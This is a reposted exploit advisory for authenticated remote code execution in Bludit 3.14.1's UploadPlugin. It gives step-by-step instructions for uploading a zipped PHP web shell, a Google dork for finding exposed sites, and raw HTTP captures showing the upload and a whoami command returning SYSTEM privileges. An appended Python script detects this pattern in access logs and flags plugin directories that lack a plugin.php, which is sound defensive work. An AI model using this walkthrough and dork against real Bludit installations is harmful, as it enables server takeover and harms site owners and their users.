Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040007

Below is a copy:

Bludit 3-14-1 Shell Upload
# Exploit Title: Bludit 3.14.1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.bludit.com/
# Version: 3.14.1
# Tested on: Windows 11 (WampServer) | Kali Linux
# Category: WebApp
# Google Dork: intext:'2022 Powered by Bludit'
# Date: 8.12.2022
######## Description ########
#
#  Bludit's optional 'UploadPlugin' plugin unpacks any zip an administrator uploads
#  straight into bl-plugins/, so a zip containing PHP becomes a web shell reachable
#  under /bl-plugins/<top-level directory in the zip>/<file>.php.
#
#  Step 1 : Pack your web shell into a zip (in the capture below: a/a.php inside a.zip)
#  Step 2 : Log in with an admin account and install the 'UploadPlugin' plugin
#  Step 3 : Go to the UploadPlugin section (/admin/plugin/uploadplugin)
#  Step 4 : Upload the zip (the form also requires the session's tokenCSRF value)
#  Step 5 : Browse to target/bl-plugins/<directory>/<file>.php, e.g. /bl-plugins/a/a.php?cmd=whoami
#
#  Note: an authenticated administrator session and a valid tokenCSRF are required; the
#  shell runs with the web server's privileges (NT AUTHORITY\SYSTEM on the WampServer host below).
#
######## Proof of Concept ########


==============> START REQUEST <========================================

POST /admin/plugin/uploadplugin HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264
Content-Length: 1820
Origin: https://036e-88-235-222-210.eu.ngrok.io
Dnt: 1
Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="tokenCSRF"

b6487f985b68f2ac2c2d79b4428dda44696d6231
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="pluginorthemes"

plugins
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="zip_file"; filename="a.zip"
Content-Type: application/zip

[binary zip body omitted: the archive holds a directory entry "a/" and the web shell "a/a.php"; the full request body is 1820 bytes]
-----------------------------308003478615795926433430552264
Content-Disposition: form-data; name="submit"

Upload
-----------------------------308003478615795926433430552264--


==============> END REQUEST <========================================

## WEB SHELL UPLOADED!

==============> START RESPONSE <========================================

HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:01:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4
Pragma: no-cache
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: Bludit
.
.
.
.

==============> END RESPONSE <========================================

# REQUEST THE WEB SHELL

==============> START REQUEST <========================================

GET /bl-plugins/a/a.php?cmd=whoami HTTP/2
Host: localhost
Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

==============> END REQUEST <========================================

==============> START RESPONSE <========================================

HTTP/2 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Dec 2022 18:13:14 GMT
Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919
Server: Apache/2.4.51 (Win64) PHP/7.4.26
X-Powered-By: PHP/7.4.26
Content-Length: 32

<pre>nt authority\system
</pre>

==============> END RESPONSE <========================================
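Two checks a Bludit operator could run after reading the captures above, as an added defensive example that is not part of the original advisory. The first correlates web-server access-log lines: a POST to /admin/plugin/uploadplugin followed by a request for a PHP file under /bl-plugins/ carrying a query string, from the same client. The second flags directories under bl-plugins/ that do not look like a plugin; it assumes a genuine Bludit plugin directory ships a plugin.php, whereas the uploaded "a/" in the capture contains only a.php. The log lines and directory listing are constructed to mirror the capture.

```python
"""Added example (not part of the original advisory): detect the
upload-then-execute pattern in access logs and audit bl-plugins/."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Apache/nginx combined log format; only the fields this check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)
UPLOAD_PATH = "/admin/plugin/uploadplugin"
# A PHP file directly inside a plugin directory, requested with a query string
# (the capture's /bl-plugins/a/a.php?cmd=whoami).
SHELL_RE = re.compile(r"^/bl-plugins/(?P<dir>[^/]+)/(?P<file>[^/?]+\.php)\?")


def parse(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_then_exec(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, plugin_dir, request_path) for every PHP request under
    bl-plugins/ with a query string that follows an accepted plugin upload by
    the same client earlier in the log."""
    uploaded: Set[str] = set()
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if (rec["method"] == "POST" and rec["path"] == UPLOAD_PATH
                and rec["status"][0] in "23"):
            uploaded.add(rec["ip"])
        elif rec["ip"] in uploaded:
            m = SHELL_RE.match(rec["path"])
            if m:
                hits.append((rec["ip"], m["dir"], rec["path"]))
    return hits


def unregistered_plugin_dirs(relative_paths: Iterable[str]) -> List[str]:
    """Given file paths relative to bl-plugins/, return the top-level directories
    that contain no plugin.php (assumed marker of a genuine Bludit plugin)."""
    files_by_dir: Dict[str, Set[str]] = defaultdict(set)
    for p in relative_paths:
        top, _, rest = p.partition("/")
        if rest:
            files_by_dir[top].add(rest)
    return sorted(d for d, files in files_by_dir.items() if "plugin.php" not in files)


# Constructed sample data modelled on the capture: the attacker uploads, then runs
# whoami through the shell; a second client only browses a legitimate plugin.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Dec/2022:18:01:43 +0000] "POST /admin/plugin/uploadplugin HTTP/2.0" 200 5123',
    '203.0.113.7 - - [08/Dec/2022:18:13:14 +0000] "GET /bl-plugins/a/a.php?cmd=whoami HTTP/2.0" 200 32',
    '198.51.100.9 - - [08/Dec/2022:18:15:00 +0000] "GET /bl-plugins/about/plugin.php HTTP/2.0" 403 199',
    '198.51.100.9 - - [08/Dec/2022:18:16:00 +0000] "GET /index.php?cmd=x HTTP/2.0" 200 100',
]
SAMPLE_TREE = [
    "about/plugin.php", "about/metadata.json",
    "uploadplugin/plugin.php", "uploadplugin/metadata.json",
    "a/a.php",
]

if __name__ == "__main__":
    for ip, plugin_dir, path in find_upload_then_exec(SAMPLE_LOG):
        print(f"suspicious: {ip} uploaded a plugin, then requested {path} (dir {plugin_dir})")
    for d in unregistered_plugin_dirs(SAMPLE_TREE):
        print(f"bl-plugins/{d}/ has no plugin.php; inspect it")
```

The log check deliberately keys on the client that performed the upload rather than on the `cmd=` parameter name, which an attacker can rename; the directory audit catches the dropped file regardless of how it is called.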
